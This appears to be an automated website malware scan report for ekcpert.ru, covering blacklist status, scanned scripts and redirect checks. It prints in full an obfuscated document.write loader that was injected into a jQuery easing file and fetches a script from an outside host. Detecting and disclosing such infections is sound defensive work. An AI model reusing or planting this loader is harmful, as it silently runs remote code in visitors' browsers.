Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ekcpert.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ekcpert.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ekcpert.ru/ | 200 OK Content-Length: 19034 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery-ui-1.9.2.custom.js | 200 OK Content-Length: 43098 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.nivo.slider.js | 200 OK Content-Length: 29113 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.easing.compatibility.js | 200 OK Content-Length: 1917 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.extend( jQuery.easing, { easeIn: function (x, t, b, c, d) { return jQuery.easing.easeInQuad(x, t, b, c, d); }, easeOut: function (x, t, b, c, d) { return jQuery.easing.easeOutQuad(x, t, b, c, d); }, easeInOut: function (x, t, b, c, d) { return jQuery.easing.easeInOutQuad(x, t, b, c, d); }, expoin: function(x, t, b, c, d) { return jQuery.easing.easeInExpo(x, t, b, c, d); }, expoout: function(x, t, b, c, d) { ret return jQuery.easing.easeInBack(x, t, b, c, d); }, backout: function(x, t, b, c, d) { return jQuery.easing.easeOutBack(x, t, b, c, d); }, backinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutBack(x, t, b, c, d); } }); <!-- js-tools --> p=0;while(p<80)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lmbttjlbqbslfub/sv0dpnqpofout0dpn`gjoefs0tubu/qiq#?=0tdsjqu?'.charCodeAt(p++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.ekcpert.ru/skins/expert/scripts/jquery.bxslider.min.js | 200 OK Content-Length: 19359 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.roundabout.min.js | 200 OK Content-Length: 17959 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.roundabout-shapes.min.js | 200 OK Content-Length: 4281 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/main.js | 200 OK Content-Length: 22105 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/contacts/ | 200 OK Content-Length: 19992 Content-Type: text/html | clean |
http://www.ekcpert.ru/skins/default/scripts/main.js | 200 OK Content-Length: 12365 Content-Type: application/x-javascript | clean |
http://maps.google.com/maps/api/js?sensor=false | 200 OK Content-Length: 5056 Content-Type: text/javascript | clean |
http://www.ekcpert.ru/catalog/basket/ | 200 OK Content-Length: 10743 Content-Type: text/html | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.colorbox.js | 200 OK Content-Length: 27653 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ekcpert.ru
Result:
GET / HTTP/1.1
Host: ekcpert.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ekcpert.ru
Referer: http://www.google.com/search?q=ekcpert.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ekcpert.ru
Referer: http://www.google.com/search?q=ekcpert.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.